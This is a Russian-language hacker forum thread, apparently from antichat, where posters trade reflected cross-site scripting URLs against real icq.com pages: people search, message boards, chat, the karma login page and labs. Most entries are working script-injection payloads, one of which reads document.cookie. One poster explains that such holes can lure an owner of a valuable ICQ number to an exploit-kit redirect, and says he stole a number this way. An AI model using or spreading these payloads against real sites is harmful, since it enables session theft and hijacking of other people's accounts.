Вроде надыбал XSS PHP: http://people.icq.com/people/?searched=1&keyword2=&my_gender=0&match=0&age_group=&home_country_code=380&m_status=0&donline_only=on&gender=0&age_group=&home_cc=380&fname=&lname=&nickname=&uin=&home_city=&home_state=&home_cc=380&origin_city=&origin_state=&origin_cc=0&work_oc=0&work_department=&work_company=&past_code=0&past_text=&interest_code=0&interest_text=&group_code=0&group_text=&photo_flag=on&online_only=on&x=4&y=8"><script>alert(/Test%20XSS%20from%20_-[A.M.D]HiM@S-_/)</script> IE PHP: http://boards.icq.com/boards/post_msg.php?topic_id=887083&reply_to=3544728&tid=696&sys_id=&return_url=%2Fboards%2Fview_messages.php%3Ftid%3D696%26topic_id%3D887083"><script>alert(/Test XSS/)</script> PHP: http://www.icq.com/icqchat/chatroom.php?c_id=13browse_folder.php?tid=30279%22;//--%3E%3C/%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
Code: http://people.icq.com/people/?searched=1&keyword2=&my_gender=0&match=0&age_group=&home_country_code=380&m_status=0&donline_only=on&gender=0&age_group=&home_cc=380&fname=&lname=&nickname=&uin=&home_city=&home_state=&home_cc=380&origin_city=&origin_state=&origin_cc=0&work_oc=0&work_department=&work_company=&past_code=0&past_text=&interest_code=0&interest_text=&group_code=0&group_text=&photo_flag=on"><script>alert()</script> найти было не трудно! там в лубую переменную вставь скрипт и будет алерт! P.S а толку от пасивных xss?
Вот еще 4 который я щас нашел: PHP: http://www.icq.com/people/?searched="><script>alert(/Dracula4ever/)</script> PHP: http://www.icq.com/people/?searched=1&keyword2=gf&my_gender=2&match=1&age_group=&home_country_code=972&m_status=0&gender=0&age_group=&home_cc=972&fname=&lname=&nickname=&uin=&home_city=&home_state=&home_cc=972&origin_city=&origin_state=&origin_cc=0&work_oc=0&work_department=&work_company=&past_code="><script>alert(/Dracula4ever/)</script> PHP: http://www.icq.com/people/?searched=1&keyword2=gf&my_gender=2&match=1&age_group=&home_country_code=972&m_status=0&gender=0&age_group=&home_cc=972&fname=&lname=&nickname=&uin=&home_city=&home_state=&home_cc=972&origin_city=&origin_state=&origin_cc=0&work_oc=0&work_department=&work_company="><script>alert(/Dracula4ever/)</script> PHP: http://www.icq.com/people/?searched=1&keyword2="><script>alert(/Dracula4ever/)</script>
Code: https://www.icq.com/karma/login_page.php?icq_number=>"><script>alert('Xss-icq.com')</script> http://forums.icq.com/forums/index.php?act=view_topic&group_id=523&topic_id=102679&forum_page=1?forum_q=>"><script>alert('Xss-icq.com')</script> https://www.icq.com/karma/login_page.php?dest=https%3A%2F%2Fwww.icq.com%2Fregister%2Femail_attach.php&sv=20&service=20&css=whitepages?uin_email=>"><script>alert('Xss-icq.com')</script> http://www.icq.com/people/?gender=0&match=1&age_group=&photo_flag=on&online_only=on&home_cc=41&searched=1&my_gender=2?keyword2=>"><script>alert('Xss-icq.com')</script>
ну ещё 1 Code: https://labs.icq.com/compad/error.html?title=register&err=blocked_country&xtra=%3Cscript%3Ealert('xss')%3C/script%3E
толк есть, к примеру впарить амеру с красивым уином редирект на связку:-D так и я себе угнал нум (только не этой хсс)
Наодили Правдо давно. http://forum.antichat.ru/showthread.php?p=153345#post153345 незнаю может еще живы. )))) хотя ооочень врядли ))
